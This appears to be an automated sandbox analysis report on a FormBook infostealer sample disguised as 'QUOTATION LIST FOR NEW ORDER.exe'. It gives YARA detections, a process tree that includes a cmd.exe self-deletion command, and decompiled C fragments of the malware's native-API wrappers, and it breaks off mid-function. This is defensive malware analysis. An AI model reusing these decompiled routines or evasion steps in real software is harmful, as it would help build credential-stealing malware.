                                                      File size:1347072 bytes
                                                      MD5 hash:2A28A3E032A65C25B90F193621B623AF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.374153809.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.374626991.00000000010B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: explorer.exe PID: 3292 Parent PID: 4760

                                                      General

                                                      Start time:18:54:56
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff662bf0000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: cmmon32.exe PID: 6056 Parent PID: 3292

                                                      General

                                                      Start time:18:55:20
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cmmon32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                      Imagebase:0x3d0000
                                                      File size:36864 bytes
                                                      MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.513637775.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: cmd.exe PID: 6068 Parent PID: 6056

                                                      General

                                                      Start time:18:55:25
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
                                                      Imagebase:0x870000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 5984 Parent PID: 6068

                                                      General

                                                      Start time:18:55:26
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff774ee0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Analysis Process: QUOTATION LIST FOR NEW ORDER.exe PID: 4760 Parent PID: 5532 QUOTATION LIST FOR NEW ORDER.exeCOMMON

                                                        Executed Functions

                                                        Function 0041825D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E0041825D(void* __ebx, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				void* _t19;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				void* _t35;

				_t14 = _a8;
				_t33 = _a8 + 0xc48;
				L00418DB0(_t31, _t14, _t33,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t7 =  &_a36; // 0x413d42
				_t13 =  &_a12; // 0x413d42
				_t19 =  *((intOrPtr*)( *_t33))( *_t13, _a16, _a20, _a24, _a28, _a32,  *_t7, _a40, _a44, _t32, _t35); // executed
				return _t19;
			}








                                                        0x00418263
                                                        0x0041826f
                                                        0x00418277
                                                        0x00418282
                                                        0x0041829d
                                                        0x004182a5
                                                        0x004182a9

                                                        APIs
                                                        • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: B=A$B=A
                                                        • API String ID: 2738559852-2767357659
                                                        • Opcode ID: a5b07969aac4544c24c12bfdec8881cb67b8ea72705e0cda53f46ab77b8a117e
                                                        • Instruction ID: 6759c8b2488b1573f3c30a02d5a51fbcca756bb259f0c76d0b0b16bc82a4d81e
                                                        • Opcode Fuzzy Hash: a5b07969aac4544c24c12bfdec8881cb67b8ea72705e0cda53f46ab77b8a117e
                                                        • Instruction Fuzzy Hash: 02F0F9B6200108AFCB08DF89DC81DEB77A9EF8C314F158249FE1D97241DA30E811CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				L00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                        0x00418263
                                                        0x0041826f
                                                        0x00418277
                                                        0x00418282
                                                        0x0041829d
                                                        0x004182a5
                                                        0x004182a9

                                                        APIs
                                                        • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: B=A$B=A
                                                        • API String ID: 2738559852-2767357659
                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = L0041AF60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                        0x00409b2c
                                                        0x00409b2f
                                                        0x00409b34
                                                        0x00409b39
                                                        0x00409b43
                                                        0x00409b48
                                                        0x00409b4b
                                                        0x00409b4d
                                                        0x00409b55
                                                        0x00409b5a
                                                        0x00409b5a
                                                        0x00409b61
                                                        0x00409b69
                                                        0x00409b6c
                                                        0x00409b6e
                                                        0x00409b82
                                                        0x00000000
                                                        0x00409b84
                                                        0x00409b8a
                                                        0x00409b3e
                                                        0x00409b3e
                                                        0x00409b3e

                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                        • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                        • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				L00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                        0x004181bf
                                                        0x004181c7
                                                        0x004181fd
                                                        0x00418201

                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				L00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                        0x0041839f
                                                        0x004183a7
                                                        0x004183c9
                                                        0x004183cd

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041838C, Relevance: 1.5, APIs: 1, Instructions: 27memorynativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E0041838C(signed int __ecx, signed int __edx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t18;
				void* _t27;

				_push(ds);
				 *(0x458bec8b + __edx * 2) =  *(0x458bec8b + __edx * 2) | __ecx;
				_t14 = _v0;
				_t7 = _t14 + 0xc60; // 0xca0
				L00418DB0(_t27, _v0, _t7,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
				_t18 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t18;
			}






                                                        0x0041838c
                                                        0x0041838e
                                                        0x00418393
                                                        0x0041839f
                                                        0x004183a7
                                                        0x004183c9
                                                        0x004183cd

                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: c8557b013e563f44ec1a6072417b41aaabe76cf5d21369ae66106f8843f1563b
                                                        • Instruction ID: c8eac929580394a7ab60f78836e037cbb4cb8ad093cfd5d0f3824c1bb25e95af
                                                        • Opcode Fuzzy Hash: c8557b013e563f44ec1a6072417b41aaabe76cf5d21369ae66106f8843f1563b
                                                        • Instruction Fuzzy Hash: 41F030B1214145ABCB15DF58DC80CE77B6DAF88224B15865DF94C97212CA34E814CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				L00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                        0x004182e3
                                                        0x004182e6
                                                        0x004182ef
                                                        0x004182f7
                                                        0x00418305
                                                        0x00418309

                                                        APIs
                                                        • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                        • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E004088A0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* __esi;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CC0( &_v284, 0x104);
						E0041A330( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = L00413DC0(L00413D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_push( &_v24);
					_t34 = E004070C0(_t39,  &_v24, _t52, _t52); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}





















                                                        0x004088ab
                                                        0x004088b3
                                                        0x004088b5
                                                        0x004088ba
                                                        0x004088bf
                                                        0x004088d2
                                                        0x004088d7
                                                        0x004088e0
                                                        0x004088ec
                                                        0x004088ff
                                                        0x00408904
                                                        0x00408907
                                                        0x00408910
                                                        0x00408922
                                                        0x00408927
                                                        0x0040892c
                                                        0x00000000
                                                        0x00000000
                                                        0x0040892e
                                                        0x00408932
                                                        0x00000000
                                                        0x00000000
                                                        0x00408934
                                                        0x00000000
                                                        0x00408932
                                                        0x00408936
                                                        0x00408939
                                                        0x0040893f
                                                        0x00408941
                                                        0x0040894c
                                                        0x00408951
                                                        0x00408954
                                                        0x0040895f
                                                        0x00408961
                                                        0x0040896c
                                                        0x0040896e
                                                        0x00408974
                                                        0x00408978
                                                        0x0040897b
                                                        0x0040897b
                                                        0x00408982
                                                        0x00408985
                                                        0x0040898a
                                                        0x00408997
                                                        0x004088c6
                                                        0x004088c6
                                                        0x004088c6

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                        • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                        • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                        • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				L00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                        0x00407260
                                                        0x0040726f
                                                        0x00407273
                                                        0x0040727e
                                                        0x0040728e
                                                        0x0040729e
                                                        0x004072a3
                                                        0x004072aa
                                                        0x004072ad
                                                        0x004072ba
                                                        0x004072bc
                                                        0x004072be
                                                        0x004072db
                                                        0x004072db
                                                        0x00000000
                                                        0x004072dd
                                                        0x004072e2

                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                        • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                        • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                        • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                        0x004184cf
                                                        0x004184d7
                                                        0x004184ed
                                                        0x004184f1

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                        • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                        0x00418497
                                                        0x004184ad
                                                        0x004184b1

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                        0x0041863a
                                                        0x00418650
                                                        0x00418654

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.373559944.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                        • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                        • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
